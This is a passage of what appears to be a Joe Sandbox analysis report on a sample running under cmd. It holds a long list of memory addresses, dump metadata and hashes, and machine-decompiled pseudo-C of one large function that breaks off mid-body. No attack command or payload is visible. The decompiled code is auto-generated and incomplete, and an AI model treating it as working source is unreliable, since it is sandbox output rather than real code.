                                                                                                                                          0x03bdfe8b
                                                                                                                                          0x03bdfe90
                                                                                                                                          0x03bdfe95
                                                                                                                                          0x03c360f7
                                                                                                                                          0x03c360fd
                                                                                                                                          0x03c360fd
                                                                                                                                          0x03c360f7
                                                                                                                                          0x03bdfe9d
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfea3
                                                                                                                                          0x03bdfea5
                                                                                                                                          0x03c36106
                                                                                                                                          0x03bdfeab
                                                                                                                                          0x03bdfeab
                                                                                                                                          0x03bdfeab
                                                                                                                                          0x03bdfeb2
                                                                                                                                          0x03bdfeb5
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfeb5
                                                                                                                                          0x03bdfe9d
                                                                                                                                          0x03bdfdab
                                                                                                                                          0x03bdfdad
                                                                                                                                          0x03c3610f
                                                                                                                                          0x03c36115
                                                                                                                                          0x03c36115
                                                                                                                                          0x03c3610f
                                                                                                                                          0x03bdfdb6
                                                                                                                                          0x03bdfdbb
                                                                                                                                          0x03c3611e
                                                                                                                                          0x03c36120
                                                                                                                                          0x03bdfdc1
                                                                                                                                          0x03bdfdc1
                                                                                                                                          0x03bdfdc5
                                                                                                                                          0x03bdfdc5
                                                                                                                                          0x03bdfdc7
                                                                                                                                          0x03bdfdcc
                                                                                                                                          0x03bdfdce
                                                                                                                                          0x03bdfdce
                                                                                                                                          0x03bdfdd6
                                                                                                                                          0x03bdfdd8
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfdd8
                                                                                                                                          0x03bdfd9d
                                                                                                                                          0x03be0018
                                                                                                                                          0x03c360a0
                                                                                                                                          0x03c360a0
                                                                                                                                          0x03bdfd4b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfd51
                                                                                                                                          0x03bdfd56
                                                                                                                                          0x03c360a9
                                                                                                                                          0x03c360af
                                                                                                                                          0x03c360af
                                                                                                                                          0x03c360a9
                                                                                                                                          0x03bdfd5e
                                                                                                                                          0x03bdfebf
                                                                                                                                          0x03c360b8
                                                                                                                                          0x03bdfec5
                                                                                                                                          0x03bdfec5
                                                                                                                                          0x03bdfec5
                                                                                                                                          0x03bdfec7
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfd64
                                                                                                                                          0x03bdfd64
                                                                                                                                          0x03bdfd68
                                                                                                                                          0x03c360c1
                                                                                                                                          0x03c360c7
                                                                                                                                          0x03c360c7
                                                                                                                                          0x03c360c1
                                                                                                                                          0x03bdfd70
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfd76
                                                                                                                                          0x03bdfd78
                                                                                                                                          0x03c360d0
                                                                                                                                          0x03bdfd7e
                                                                                                                                          0x03bdfd7e
                                                                                                                                          0x03bdfd7e
                                                                                                                                          0x03bdfd80
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfd80
                                                                                                                                          0x03bdfd70
                                                                                                                                          0x03bdfd5e
                                                                                                                                          0x03bdfd35
                                                                                                                                          0x03bdfd1f
                                                                                                                                          0x03c3604c
                                                                                                                                          0x03c3604c
                                                                                                                                          0x03bdfcb7
                                                                                                                                          0x03bdffc0
                                                                                                                                          0x03bdffc3
                                                                                                                                          0x03bdffc6
                                                                                                                                          0x03bdffcb
                                                                                                                                          0x03c36055
                                                                                                                                          0x03c3605b
                                                                                                                                          0x03c3605b
                                                                                                                                          0x03c36055
                                                                                                                                          0x03bdffd3
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdffd9
                                                                                                                                          0x03bdffdb
                                                                                                                                          0x03c36064
                                                                                                                                          0x03bdffe1
                                                                                                                                          0x03bdffe1
                                                                                                                                          0x03bdffe1
                                                                                                                                          0x03bdffe3
                                                                                                                                          0x03bdffe7
                                                                                                                                          0x03bdffed
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdffed
                                                                                                                                          0x03bdffd3
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfcb7
                                                                                                                                          0x03c3603f
                                                                                                                                          0x03bdfc9a
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfc9a
                                                                                                                                          0x03bdfc77
                                                                                                                                          0x03bdfc61
                                                                                                                                          0x03bdfc4e
                                                                                                                                          0x03bdfc33
                                                                                                                                          0x03c35fe5
                                                                                                                                          0x03c35fe5
                                                                                                                                          0x03bdfbf5
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfbf5
                                                                                                                                          0x03bdfbdf
                                                                                                                                          0x03bdfa05
                                                                                                                                          0x03bdfa05
                                                                                                                                          0x03bdfa0a
                                                                                                                                          0x03bdfe14
                                                                                                                                          0x03c35fb8
                                                                                                                                          0x03c35fb8
                                                                                                                                          0x03bdfe1e
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfe24
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfe24
                                                                                                                                          0x03bdfe1e
                                                                                                                                          0x03bdfa10
                                                                                                                                          0x03bdfa10
                                                                                                                                          0x03bdfa15
                                                                                                                                          0x03bdfe29
                                                                                                                                          0x03bdfe2d
                                                                                                                                          0x03bdfe35
                                                                                                                                          0x03bdfe38
                                                                                                                                          0x03bdfe3b
                                                                                                                                          0x03c35fc1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c35fc7
                                                                                                                                          0x03bdfe43
                                                                                                                                          0x03bdfe45
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfe4b
                                                                                                                                          0x03bdfe50
                                                                                                                                          0x03c35fd0
                                                                                                                                          0x03c35fd6
                                                                                                                                          0x03c35fd6
                                                                                                                                          0x03c35fd0
                                                                                                                                          0x03bdfe5d
                                                                                                                                          0x03bdfe60
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfe60
                                                                                                                                          0x03bdfe41
                                                                                                                                          0x03bdfe41
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfa1b
                                                                                                                                          0x03bdfa1b
                                                                                                                                          0x03bdfa1d
                                                                                                                                          0x03bdfa20
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfa20
                                                                                                                                          0x03bdfa15
                                                                                                                                          0x03bdf9ed
                                                                                                                                          0x03bdf9ed
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdf9ed
                                                                                                                                          0x03bdf9cd
                                                                                                                                          0x03bdf9ba
                                                                                                                                          0x03bdf9ba
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdf9ba
                                                                                                                                          0x03bdfba8
                                                                                                                                          0x03bdfb65
                                                                                                                                          0x03bdfb1d
                                                                                                                                          0x03bdfb23
                                                                                                                                          0x03bdfb26
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfb26
                                                                                                                                          0x03bdfaf3
                                                                                                                                          0x03bdfaf3
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfaf3
                                                                                                                                          0x03bdfab4
                                                                                                                                          0x03bdfa79
                                                                                                                                          0x03bdfa56
                                                                                                                                          0x03bdfa56
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdfa56
                                                                                                                                          0x03bdf94d
                                                                                                                                          0x03bdf950
                                                                                                                                          0x03bdf955
                                                                                                                                          0x03c35e79
                                                                                                                                          0x03c35e7f
                                                                                                                                          0x03c35e7f
                                                                                                                                          0x03c35e79
                                                                                                                                          0x03bdf95b
                                                                                                                                          0x03bdf960
                                                                                                                                          0x03c35e88
                                                                                                                                          0x03c35e8a
                                                                                                                                          0x03c35e8a
                                                                                                                                          0x03c35e8e
                                                                                                                                          0x03c35e93
                                                                                                                                          0x00000000
                                                                                                                                          0x03c35e99
                                                                                                                                          0x03c35e9c
                                                                                                                                          0x03c35e9f
                                                                                                                                          0x03c35ea1
                                                                                                                                          0x03c35ea3
                                                                                                                                          0x03c35ea3
                                                                                                                                          0x03c35ea7
                                                                                                                                          0x00000000
                                                                                                                                          0x03c35ea7
                                                                                                                                          0x03bdf966
                                                                                                                                          0x03bdf966
                                                                                                                                          0x03bdf96b
                                                                                                                                          0x03c35eb0
                                                                                                                                          0x03c35eb6
                                                                                                                                          0x03c35eb6
                                                                                                                                          0x03c35eb0
                                                                                                                                          0x03bdf973
                                                                                                                                          0x03bdfbc7
                                                                                                                                          0x03bdf9a5
                                                                                                                                          0x03bdf9a5
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdf979
                                                                                                                                          0x03bdf97d
                                                                                                                                          0x03bdf97f
                                                                                                                                          0x03c35ebf
                                                                                                                                          0x03c35ec5
                                                                                                                                          0x03c35ec5
                                                                                                                                          0x03c35ebf
                                                                                                                                          0x03bdf987
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdf98d
                                                                                                                                          0x03bdf98d
                                                                                                                                          0x03bdf990
                                                                                                                                          0x03bdf994
                                                                                                                                          0x03bdf997
                                                                                                                                          0x03bdf99f
                                                                                                                                          0x03bdfff7
                                                                                                                                          0x03be0061
                                                                                                                                          0x03be0064
                                                                                                                                          0x03be006a
                                                                                                                                          0x03c35ece
                                                                                                                                          0x03c35ed0
                                                                                                                                          0x03c35ed0
                                                                                                                                          0x00000000
                                                                                                                                          0x03be0064
                                                                                                                                          0x03bdfffd
                                                                                                                                          0x03be0000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be0006
                                                                                                                                          0x03c35ecc
                                                                                                                                          0x00000000
                                                                                                                                          0x03c35ecc
                                                                                                                                          0x03be0000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdf99f
                                                                                                                                          0x03bdf987
                                                                                                                                          0x03bdf973

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                                                                                          • Instruction ID: 2908158a3f071d4ef17274ff8e0ef324b8fa6b7b3123b67e23480419fc4128d4
                                                                                                                                          • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                                                                                          • Instruction Fuzzy Hash: AF62F436E096569BCB21CE69848027AFBB5EF46618F1D82F8CC56DF346E371D9418780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA5BA5 Relevance: .6, Instructions: 592COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                          			E03CA5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x3cb1178);
				E03C2D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03CA4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E03C1D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03CA5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x3cc60e8;
								if( *0x3cc60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x3cc60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03C19710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03C16DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E03C1F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E03C1F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E03C1F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E03C1FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E03C1FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E03C1F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E03C1F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03CA4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
